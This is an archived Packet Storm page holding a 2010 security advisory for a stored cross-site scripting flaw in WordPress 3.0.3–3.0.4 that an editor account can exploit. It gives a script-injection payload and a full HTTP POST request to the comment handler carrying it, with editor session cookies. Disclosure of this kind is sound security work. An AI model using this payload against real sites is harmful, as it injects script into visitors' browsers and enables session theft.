what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress 3.0.4 Stored Cross Site Scripting

WordPress 3.0.4 Stored Cross Site Scripting
Posted Dec 30, 2010
Authored by Sir | Site anatoliasecurity.com

WordPress version 3.0.4 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 226c9b8585f3659298b3eec5cd34555b70668b654f9137580694e2432119109f
Download | Favorite | View

WordPress 3.0.4 Stored Cross Site Scripting

Change Mirror Download
ANATOLIA SECURITY ADVISORY
--------------------------------------
  
### ADVISORY INFO ###
+ Title: Wordpress 3.0.4 Stored XSS (Role: Editor)
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-005.txt
+ Advisory ID:  2010-005
+ Versions: Wordpress 3.0.4, 3.0.3 (maybe earlies versions)
+ Date: 30/12/2010
+ Vendor: WordPress Blog Tool and Publishing Platform
+ Impact: Execute Malicious Javascript Codes
+ CWE-ID: 79 (Cross-site Scripting)
+ Credit: Anatolia Security
+ Author: Sir - sir[at]anatoliasecurity[dot]com
  
  
### VULNERABLE PRODUCT ###
+ Wordpress: "WordPress is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time."
+ Homepage: http://wordpress.org
  
  
  
### VULNERABILITY DETAILS ###
+ Description: Attackers can execute malicious javascript codes or hijacking SESSION for privilege escalation. The attacker has to be the authority of the editor.
 
Screenshot: http://img3.imageshack.us/img3/1148/wordpressx.png
PoC: '"--></style></script><script>alert('XSS')</script>
 
POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/wordpress304/?page_id=2
Content-Length: 189
Cache-Control: max-age=0
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.3
Cookie: wp-settings-time-1=1293719651; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a9710e337f5b83061184233e85654d2c=editor%7C1293893085%7C1b3f84f58059c0fcf262ef1bb83635c2; wp-settings-time-3=1293720285
 
comment=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&submit=Post+Comment&comment_post_ID=2&comment_parent=0&_wp_unfiltered_html_comment=7741b495eb

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close